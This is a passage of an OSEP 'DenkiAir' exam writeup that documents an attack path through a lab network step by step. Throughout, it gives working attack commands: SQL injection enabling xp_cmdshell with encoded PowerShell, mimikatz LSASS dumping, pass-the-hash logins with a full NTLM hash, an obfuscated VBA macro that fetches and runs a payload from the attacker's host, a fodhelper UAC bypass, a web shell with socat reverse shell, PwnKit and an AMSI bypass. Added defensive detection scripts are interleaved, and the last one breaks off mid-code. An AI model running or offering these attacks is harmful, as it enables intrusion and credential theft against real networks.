OSEP DenkiAir Writeup June 2022


Exam path 1

DB01
An nmap scan found a web application running on port 80 on 192.xxx.xxx.xxx. The website allowed booking flight tickets and also allowed filtering routes by source and destination through the src and dst parameters. The src parameter was vulnerable to SQL injection, which gave access to DB01.denkiair-ops.com.

SeImpersonatePrivilege was enabled on DB01, which allowed privilege escalation using PrintSpoofer.

When src is given an always-true condition (' or 1=1;--) it prints every source and destination, so there is a chance of SQLi.
ExamServices#4864
Give src= the payload below (the command below is used to execute the process hollowing shellcode runner; it can be any command):

';EXECUTE AS LOGIN = 'sa';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC xp_cmdshell 'powershell.exe -exec bypass -enc JABkAGEAdABhACAAPQAgACgATgBlAxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxAGwAKQA7AA=='--

And we got a shell on DB01.
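As an added example (not part of the writeup), the Python below scans web-server access log lines for the two things the injection above relies on: an always-true condition in the src parameter, and stacked T-SQL that switches on xp_cmdshell and runs an encoded PowerShell command. The log lines, the /routes path and the client addresses are constructed for the example; only the src/dst parameter names come from the page.

```python
"""Detecting stacked-query SQL injection against the src/dst route filter.

Added example (not from the writeup).  Scans access log lines for the
patterns the injection above relies on: an always-true tautology in src and
stacked T-SQL that enables xp_cmdshell.  Log lines are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access log lines (combined-format style, trimmed).  The third
# line mirrors the sp_configure / xp_cmdshell chain from the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2022:10:01:02 +0000] "GET /routes?src=LHR&dst=NRT HTTP/1.1" 200 512
10.0.0.9 - - [01/Jun/2022:10:01:05 +0000] "GET /routes?src=%27+or+1%3D1%3B--&dst=NRT HTTP/1.1" 200 9031
10.0.0.9 - - [01/Jun/2022:10:01:09 +0000] "GET /routes?src=%27%3BEXECUTE+AS+LOGIN+%3D+%27sa%27%3BEXEC+sp_configure+%27xp_cmdshell%27%2C+1%3B+RECONFIGURE%3BEXEC+xp_cmdshell+%27powershell.exe+-exec+bypass+-enc+JABkAGEAdABh%27--&dst=NRT HTTP/1.1" 500 0
10.0.0.7 - - [01/Jun/2022:10:02:00 +0000] "GET /routes?src=O%27Hare&dst=SFO HTTP/1.1" 200 480
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# (pattern, label), evaluated case-insensitively against the decoded parameter value.
INDICATORS = [
    (re.compile(r"'\s*or\s+1\s*=\s*1", re.I), "tautology"),
    (re.compile(r"'\s*;", re.I), "stacked-query"),
    (re.compile(r"\bexecute\s+as\s+login\b", re.I), "execute-as-login"),
    (re.compile(r"\bsp_configure\b", re.I), "sp_configure"),
    (re.compile(r"\bxp_cmdshell\b", re.I), "xp_cmdshell"),
    (re.compile(r"\breconfigure\b", re.I), "reconfigure"),
    (re.compile(r"-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I), "encoded-powershell"),
]
WATCHED_PARAMS = ("src", "dst")


def analyze_request(log_line):
    """Return {param: [labels]} for each watched parameter that matched an indicator."""
    findings = {}
    m = REQUEST_RE.search(log_line)
    if not m:
        return findings
    query = urlsplit(m.group(1)).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for raw in values:
            value = unquote_plus(raw)  # parse_qs decoded once; catch double-encoded values too
            labels = [label for pattern, label in INDICATORS if pattern.search(value)]
            if labels:
                findings.setdefault(name, []).extend(labels)
    return findings


def scan_log(text):
    """Return (source_ip, param, labels) for every suspicious line; benign lines are skipped."""
    hits = []
    for line in text.splitlines():
        findings = analyze_request(line)
        if not findings:
            continue
        ip = line.split(" ", 1)[0]
        for param, labels in findings.items():
            hits.append((ip, param, labels))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The apostrophe in O'Hare shows why a single quote alone is not an indicator: the rules key on the quote followed by a statement separator or a tautology, and on the server-side procedure names, which a legitimate airport filter never carries.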

DB01 privesc
SeImpersonatePrivilege is enabled. GitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019
Disable Defender.

Upload PrintSpoofer and run it.

PrintSpoofer.exe -i -c cmd

And we are SYSTEM.

Lateral movement from DB01 to COM1

After dumping credentials with mimikatz, found the NTLM hash of the Mohammad.George user and was able to crack it with John the Ripper. He was allowed to SSH into COM01.

Dump credentials with mimikatz.

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"
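As an added example (not part of the writeup), the Python below evaluates Sysmon Event ID 10 (ProcessAccess) records for the kind of LSASS access that sekurlsa::logonpasswords and lsadump::lsa /patch require. The events, the paths and the allowlist of benign source images are constructed; the field names follow Sysmon's ProcessAccess schema.

```python
"""Flagging LSASS memory access of the kind sekurlsa::logonpasswords performs.

Added example, not from the writeup.  Sysmon Event ID 10 records which
process opened which other process and with what access mask.  Reading
credentials out of LSASS needs PROCESS_VM_READ; patching it (lsadump::lsa
/patch) needs PROCESS_VM_WRITE.  Any opener of lsass.exe that asks for those
rights and is not on the host's allowlist gets flagged.  Events and the
allowlist below are constructed for this example.
"""

PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_CREATE_THREAD = 0x0002
SENSITIVE_RIGHTS = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# Constructed allowlist: images that legitimately open LSASS on this host.  Compared
# case-insensitively.  A path-only allowlist is bypassable by injecting into an
# allowed process, so pair it with the CallTrace field in production.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

SAMPLE_EVENTS = [  # constructed Sysmon ID 10 records
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Windows\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]


def decode_rights(mask):
    """Name the sensitive rights present in a Sysmon GrantedAccess value."""
    names = []
    if mask & PROCESS_VM_READ:
        names.append("VM_READ")
    if mask & PROCESS_VM_WRITE:
        names.append("VM_WRITE")
    if mask & PROCESS_CREATE_THREAD:
        names.append("CREATE_THREAD")
    return names


def is_suspicious_lsass_access(event):
    """True when a non-allowlisted process opens lsass.exe with read/write/thread rights."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    if not mask & SENSITIVE_RIGHTS:
        return False
    return event.get("SourceImage", "").lower() not in BENIGN_SOURCES


def triage(events):
    """Return (SourceImage, GrantedAccess, rights) for every suspicious event."""
    return [(e["SourceImage"], e["GrantedAccess"], decode_rights(int(e["GrantedAccess"], 16)))
            for e in events if is_suspicious_lsass_access(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The "!+" and "!processprotect" steps in the command above load mimikatz's kernel driver to strip LSASS protection, which shows up separately as a Sysmon Event ID 6 (driver load); Event 10 only catches the user-mode handle that follows.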

Found the NTLM hash of Mohammad.George: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
Cracked the hash with John the Ripper:

john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

And found the password is Iloveyou1.

Mohammad.George can SSH into COM1 with the same credential.

proxychains -q ssh Mohammad.George@172.xxx.xxx.xxx


Lateral movement to Client01

Running services:

systemctl --type=service

And found:

rocketchat.service loaded active running The Rocket.Chat server

Looking at /usr/lib/systemd/system/rocketchat.service showed how Rocket.Chat connects to its MongoDB.

Install the mongo shell and connect to mongodb://db02.denkiair-ops.com:27017/rocketchat

sudo proxychains -q mongo "mongodb://db02.denkiair-ops.com:27017/rocketchat"

While enumerating MongoDB, found that someone is looking for denki_proj_wip.docm:

MongoDB shell version v5.0.9
connecting to: mongodb://db02.denkiair-ops.com:27017/rocketchat?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ec516f28-377a-468a-a06f-3f72208d7508") }
MongoDB server version: 5.0.3
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
---
The server generated these startup warnings when booting:
2022-05-30T00:25:18.215-07:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
Enable MongoDB's free cloud-based monitoring service, which will then receive and display
metrics about your deployment (disk utilization, CPU, operation statistics, etc).

The monitoring data will be available on a MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB may use this information to make product
improvements and to suggest MongoDB products and deployment options to you.

To enable free monitoring, run the following command: db.enableFreeMonitoring()
To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
rs01:PRIMARY> show dbs
admin 0.000GB
config 0.000GB
local 0.019GB
rocketchat 0.006GB
rs01:PRIMARY> use rocketchat
switched to db rocketchat
rs01:PRIMARY> show collections
_raix_push_app_tokens
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
omnichannel_auto_close_on_hold_scheduler
omnichannel_queue_inactivity_monitor
omnichannel_scheduler
rocketchat trash
rocketchat_analytics
rocketchat_apps
rocketchat_apps_logs
rocketchat_apps_persistence
rocketchat_apps_scheduler
rocketchat_avatars
rocketchat_avatars.chunks
rocketchat_avatars.files
rocketchat_banner
rocketchat_banner_dismiss
rocketchat_canned_response
rocketchat_credential_tokens
rocketchat_cron_history
rocketchat_custom_emoji
rocketchat_custom_sounds
rocketchat_custom_user_status
rocketchat_email_inbox
rocketchat_email_message_history
rocketchat_export_operations
rocketchat_federation_dns_cache
rocketchat_federation_keys
rocketchat_federation_room_events
rocketchat_federation_servers
rocketchat_import
rocketchat_import_data
rocketchat_integration_history
rocketchat_integrations
rocketchat_invites
rocketchat_livechat_agent_activity
rocketchat_livechat_business_hours
rocketchat_livechat_custom_field
rocketchat_livechat_department
rocketchat_livechat_department_agents
rocketchat_livechat_external_message
rocketchat_livechat_inquiry
rocketchat_livechat_page_visited
rocketchat_livechat_priority
rocketchat_livechat_tag
rocketchat_livechat_trigger
rocketchat_livechat_unit_monitors
rocketchat_livechat_visitor
rocketchat_message
rocketchat_message_read_receipt
rocketchat_notification_queue
rocketchat_nps
rocketchat_nps_vote
rocketchat_oauth_apps
rocketchat_oembed_cache
rocketchat_omnichannel_queue
rocketchat_permissions
rocketchat_reports
rocketchat_roles
rocketchat_room
rocketchat_server_events
rocketchat_sessions
rocketchat_settings
rocketchat_smarsh_history
rocketchat_statistics
rocketchat_subscription
rocketchat_team
rocketchat_team_member
rocketchat_uploads
rocketchat_user_data_files
rocketchat_webdav_accounts
ufsTokens
users
usersSessions
rs01:PRIMARY> db.rocketchat_room.find()
{ "_id" : "GENERAL", "ts" : ISODate("2021-11-12T10:30:14.143Z"), "t" : "c", "name" : "general", "usernames" : [ ], "msgs" : 6, "usersCount" : 3, "default" : true, "_updatedAt" : ISODate("2021-11-18T10:09:14.708Z"), "lastMessage" : { "_id" : "FawnHo6e2aX6dbHAA", "rid" : "GENERAL", "msg" : "hey", "ts" : ISODate("2021-11-18T10:09:14.691Z"), "u" : { "_id" : "dqf7zEioxHbruaja6", "username" : "guy.edwards", "name" : "guy edwards" }, "urls" : [ ], "mentions" : [ ], "channels" : [ ], "md" : [ { "type" : "PARAGRAPH", "value" : [ { "type" : "PLAIN_TEXT", "value" : "hey" } ] } ], "_updatedAt" : ISODate("2021-11-18T10:09:14.701Z") }, "lm" : ISODate("2021-11-18T10:09:14.691Z") }
{ "_id" : "dLwqQqqE7sH63EREy", "fname" : "dev", "customFields" : { }, "description" : "development channel", "broadcast" : false, "encrypted" : false, "name" : "dev", "t" : "c", "msgs" : 5, "usersCount" : 3, "u" : { "_id" : "iM4zdioSyuizfHmke", "username" : "support" }, "ts" : ISODate("2021-11-18T10:04:08.559Z"), "ro" : false, "_updatedAt" : ISODate("2021-11-30T16:19:24.353Z"), "lastMessage" : { "_id" : "52oqTesGqcgRGgckq", "rid" : "dLwqQqqE7sH63EREy", "msg" : "I will save it as \"denki_proj_wip.docm\", you can ignore any other files", "ts" : ISODate("2021-11-30T16:19:24.254Z"), "u" : { "_id" : "k4R3ekkXJaiH2Zxg7", "username" : "ian.murphy", "name" : "ian murphy" }, "urls" : [ ], "mentions" : [ ], "channels" : [ ], "md" : [ { "type" : "PARAGRAPH", "value" : [ { "type" : "PLAIN_TEXT", "value" : "I will save it as \"denki_proj_wip.docm\", you can ignore any other files" } ] } ], "_updatedAt" : ISODate("2021-11-30T16:19:24.306Z") }, "lm" : ISODate("2021-11-30T16:19:24.254Z") }
rs01:PRIMARY> ^C
bye
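The startup warning in the banner above ("Access control is not enabled for the database") is the whole reason the Rocket.Chat message history could be read from another host. As an added example (not part of the writeup), the Python below audits a mongod.conf for that setting and the related ones (bind address, replica-set key file, TLS) and reports each weak value beside the value that fixes it. Both configuration texts are constructed; the lab's real mongod.conf is not on the page.

```python
"""Auditing a mongod configuration for the exposure seen on db02.

Added example, not from the writeup.  Parses the two-level subset of
mongod.conf YAML that the relevant settings live in (no PyYAML needed) and
reports weak settings next to the expected value.  Both configs are
constructed for this example.
"""

WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0
replication:
  replSetName: rs01
"""

HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1,10.20.30.40
  tls:
    mode: requireTLS
security:
  authorization: enabled
  keyFile: /etc/mongo/keyfile
replication:
  replSetName: rs01
"""


def parse_simple_yaml(text):
    """Parse the indentation-based 'key: value' subset used by mongod.conf into nested dicts."""
    root = {}
    stack = [(-1, root)]  # (indent level, mapping being filled)
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip()
        while stack[-1][0] >= indent:  # climb back out to the enclosing mapping
            stack.pop()
        parent = stack[-1][1]
        if value == "":
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root


def audit_mongod(text):
    """Return (setting, observed, expected) for each weak setting in a mongod.conf text."""
    cfg = parse_simple_yaml(text)
    security = cfg.get("security", {})
    net = cfg.get("net", {})
    findings = []
    auth = security.get("authorization", "disabled")  # mongod default when absent
    if auth != "enabled":
        findings.append(("security.authorization", auth, "enabled"))
    bind = net.get("bindIp", "127.0.0.1")
    if any(ip.strip() in ("0.0.0.0", "::") for ip in bind.split(",")):
        findings.append(("net.bindIp", bind, "specific interface addresses only"))
    if cfg.get("replication") and not security.get("keyFile"):
        findings.append(("security.keyFile", "absent", "set (replica set members must authenticate)"))
    tls_mode = net.get("tls", {}).get("mode", "disabled")
    if tls_mode != "requireTLS":
        findings.append(("net.tls.mode", tls_mode, "requireTLS"))
    return findings


if __name__ == "__main__":
    for finding in audit_mongod(WEAK_CONF):
        print("%s: %s (expected %s)" % finding)
```

With authorization enabled, the application's own connection string (the one that rocketchat.service reveals) also has to carry a user limited to the rocketchat database, so that a leaked service file no longer equals read access to every collection.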

While checking /etc/samba/smb.conf, found the /transfer share. Let's try adding the docm.

Create a .docm named denki_proj_wip.docm.

Add a malicious macro which will download the process hollowing DLL file and execute it:

Payload encrypter

$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.xxx.xxx.xxx/dll.txt'))"
[string]$output = ""
# Shift each character code by 17 and zero-pad it to three digits.
$payload.ToCharArray() | %{
    [string]$thischar = [byte][char]$_ + 17
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output | clip

Paste the output as Apples in the VBA code below.

File name encrypter

$payload = "denki_proj_wip.docm"
[string]$output = ""
# Same shift-by-17 encoding as above, applied to the document name.
$payload.ToCharArray() | %{
    [string]$thischar = [byte][char]$_ + 17
    if($thischar.Length -eq 1)
    {
        $thischar = [string]"00" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 2)
    {
        $thischar = [string]"0" + $thischar
        $output += $thischar
    }
    elseif($thischar.Length -eq 3)
    {
        $output += $thischar
    }
}
$output | clip

Paste the output inside If ActiveDocument.Name <> Nuts("").

VBA code

Sub SubstitutePage()
    ActiveDocument.Content.Select
    Selection.Delete
    ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
    MyMacro
End Sub

' Decode one three-digit group back to a character.
Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

' First three digits of the encoded string.
Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

' Encoded string with the first three digits removed.
Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

' Decode a whole encoded string, three digits at a time.
Function Nuts(Milk)
    Do
        Oatmilk = Oatmilk + Pears(Strawberries(Milk))
        Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function

Function MyMacro()
    If ActiveDocument.Name <> Nuts("117118127124122112129131128123112136122129063117128116126") Then
        Exit Function
    End If
    Dim Apples As String
    Dim Water As String
    Apples = "129128xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx056058058"
    Wait (5)
    Water = Nuts(Apples)
    GetObject(Nuts("136122127126120126133132075")).Get(Nuts("104122127068067112097131128116118132132")).Create Water, Tea, Coffee, Napkin
End Function

Sub AutoOpen()
    MyMacro
    SubstitutePage
End Sub

Sub Document_Open()
    MyMacro
    SubstitutePage
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
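As an added example (not part of the writeup), the Python below does offline what the macro's Nuts() function does at run time, so that an analyst triaging a suspicious .docm can read the hidden strings without opening the document. decode_shifted() is the inverse of the PowerShell encrypter above and encode_shifted() repeats the encrypter's transformation to round-trip the decoder. The three literals are the ones visible in the macro above; the macro fragment they are placed in is constructed.

```python
"""Recovering the strings hidden by the macro's Nuts()/Pears() encoding.

Added example, not from the writeup.  The VBA above stores every string as a
run of three-digit groups, each a character code plus 17: Strawberries()
peels three digits, Pears() does Chr(n - 17), Almonds() drops them, and
Nuts() loops until the string is empty.  The literals below are the ones
visible in the macro; the fragment they are embedded in is constructed.
"""
import re

SHIFT = 17
GROUP = 3

# The literals as they appear in the macro above (page-break splits joined).
NAME_CHECK = "117118127124122112129131128123112136122129063117128116126"
WMI_MONIKER = "136122127126120126133132075"
WMI_CLASS = "104122127068067112097131128116118132132"


def decode_shifted(blob, shift=SHIFT):
    """Inverse of Nuts(): split into 3-digit groups, subtract the shift, map to characters."""
    digits = re.sub(r"\s+", "", blob)  # tolerate line breaks copied from a document
    if not digits.isdigit() or len(digits) % GROUP:
        raise ValueError("expected digits in groups of %d" % GROUP)
    return "".join(chr(int(digits[i:i + GROUP]) - shift) for i in range(0, len(digits), GROUP))


def encode_shifted(text, shift=SHIFT):
    """Same transformation as the PowerShell encrypter: ord(c)+shift, zero-padded to 3 digits."""
    return "".join("%03d" % (ord(c) + shift) for c in text)


def extract_literals(vba_source):
    """Pull every digit-string literal passed to Nuts() out of macro text."""
    return re.findall(r'Nuts\("(\d+)"\)', vba_source)


def triage_macro(vba_source):
    """Map each Nuts() literal in the macro text to its decoded value."""
    return {lit: decode_shifted(lit) for lit in extract_literals(vba_source)}


# Constructed fragment mirroring the macro above, carrying its three literals.
SAMPLE_MACRO = (
    'If ActiveDocument.Name <> Nuts("%s") Then\n'
    '    Exit Function\n'
    'End If\n'
    'GetObject(Nuts("%s")).Get(Nuts("%s")).Create Water, Tea, Coffee, Napkin\n'
) % (NAME_CHECK, WMI_MONIKER, WMI_CLASS)

if __name__ == "__main__":
    for encoded, plain in triage_macro(SAMPLE_MACRO).items():
        print(encoded, "->", plain)
```

Decoding the first literal gives the file name the macro checks against (the sandbox-evasion step: a renamed copy of the document does nothing), and the other two show that process creation goes through WMI rather than Shell(), which is why a detection keyed on the Shell or WScript.Shell objects would miss this macro.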

Copy denki_proj_wip.docm to the /transfer folder on COM1 and start the meterpreter listener.

After a while we have a connection from client01 as DENKIAIR-OPS\Guy.Edwards.

The commands below run the AMSI bypass and the PowerShell hollowing DLL through fodhelper.exe:

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe -exec bypass -enc JABhAD0AWwBSAGUAZxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxAB5AF0AOgA6AEwAbwBhAGQAKAAkAGQAY
QB0AGEAKQA7ACAAJABjAGwAYQBzAHMAIAA9ACAAJABhAHMAcwBlAG
0ALgBHAGUAdABUAHkAcABlACgAIgBQAHIAbwBjAGUAcwBzAEgAbwB
sAGwAbwB3AGkAbgBnAEQAZQBjAHIAeQBwAHQAZQxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxJABuAHUAbABsACkAOwA=" -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

C:\Windows\System32\fodhelper.exe

Lateral movement to DC01

mimikatz

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"

Got the hash of ian.murphy, who is a domain admin.

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement web01

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement web03

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement db02

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Exam path 2

web02
There is an option to apply for a job. There is upload functionality and we can upload a .phtml file.
While directory brute forcing, found http://192.xxx.xxx.xxx/db/. Browsing to that page found app.db.

After downloading app.db and going through it, found that it renames uploaded files, and was able to see the path.

Start an nc listener.

nc -nvlp 443

Browse to http://192.xxx.xxx.xxx/uploads/xxxxxxx.phtml

And got a reverse shell.

Get a stable shell with socat:

Start the listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Copy the socat binary to web02 and give it executable permission.

chmod +x socat

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.xxx.xxx.xxx:4444

And we have a stable shell.

web02 Privesc
Run the 2021 PwnKit (CVE-2021-4034) exploit from GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Compile the code and transfer it to web02.

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Run PwnKit:

chmod +x PwnKit
./PwnKit

web02 Persistence
Change the password of the root user.

passwd

SSH in as root with the new password:

ssh root@192.xx.xxx.xxx

web02 lateral movement to admin01 (lisa.price@denkiair.com)
Found krb5cc 1xxx xxxxx in /tmp. The krb5cc cache file name was changing every few seconds, hence there is some network activity from lisa.price.

Dumped the network traffic with tcpdump.

tcpdump -i ens192 -w capture_file

Transferred the capture file to Kali and opened it in Wireshark to inspect it. While enumerating, found the credentials of lisa.price.
As we have root on web02 we can switch user to lisa.price@denkiair.com

su lisa.price@denkiair.com

And we can SSH to 172.16.106.115 (admin01)

(admin01) privesc

We have full sudo permissions.

Run the command below to escalate privileges to root.

sudo /bin/bash
admin01 to admin02 lateral movement
There is network activity going on from matthew.lucas.

tcpdump -i ens160 -w capture_file_admin01

Transfer the file to Kali and open it in Wireshark. Found that there is a regular SSH connection coming from 172.xxx.xxx.xxx.

As we have root access on admin01 we can use strace to get the credentials. Spying on ssh password using strace | by debojit | Medium

Run the command below to get the process id:

ps aux | grep ssh

And we got the process id: 34511. Run strace to find the credential.

sudo strace -p xxxxx

And the credential is Hxxxxxxxxxx_.

Use psexec to log in to 172.xxx.xxx.xxx.

proxychains -q python3 /usr/share/doc/python3-impacket/examples/psexec.py matthew.lucas:Hxxxxxxxxxx_@172.xxx.xxx.xxx

And we have access on admin02.

admin02 Privilege escalation

SeImpersonatePrivilege is enabled. GitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019

Disable Defender.
Upload PrintSpoofer and run it.

And we have SYSTEM privileges.

admin02 matthew to molly

Disable AMSI

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
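As an added example (not part of the writeup), the Python below scores PowerShell script block log entries (Event ID 4104, Microsoft-Windows-PowerShell/Operational) for the reflection pattern the one-liner above uses. Script block logging records the text the engine actually runs, so it sees this one-liner even when it was delivered as -enc base64, as in the earlier sections. The sample blocks are constructed; the first reproduces the one-liner above, the other two are benign look-alikes.

```python
"""Spotting AMSI tampering in PowerShell script block logs (Event ID 4104).

Added example, not from the writeup.  The one-liner above finds the AMSI
helper type by a wildcard on its name, pulls its non-public static fields,
finds the one ending in "Context" and overwrites it through Marshal::Copy.
Each of those steps is an indicator; one alone is weak (plenty of scripts
enumerate types), several together in one block are not.  Sample blocks
are constructed.
"""
import re

INDICATORS = {
    "amsi-type-wildcard": re.compile(r"-like\s*['\"]\*iUtils['\"]", re.I),
    "amsi-type-literal": re.compile(r"AmsiUtils", re.I),
    "nonpublic-static-fields": re.compile(r"GetFields\(\s*['\"]NonPublic,\s*Static['\"]\s*\)", re.I),
    "context-field": re.compile(r"-like\s*['\"]\*Context['\"]|amsiContext|amsiInitFailed", re.I),
    "marshal-copy-to-field": re.compile(r"Marshal\]::Copy\(", re.I),
    "ref-assembly-types": re.compile(r"\[Ref\]\.Assembly\.GetTypes\(\)", re.I),
}
THRESHOLD = 3  # indicators per block before it is reported

SAMPLE_BLOCKS = {  # constructed 4104 ScriptBlockText values keyed by a made-up ScriptBlockId
    "block-1": ("$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like \"*iUtils\") {$c=$b}};"
                "$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like \"*Context\") {$f=$e}};"
                "$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);"
                "[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)"),
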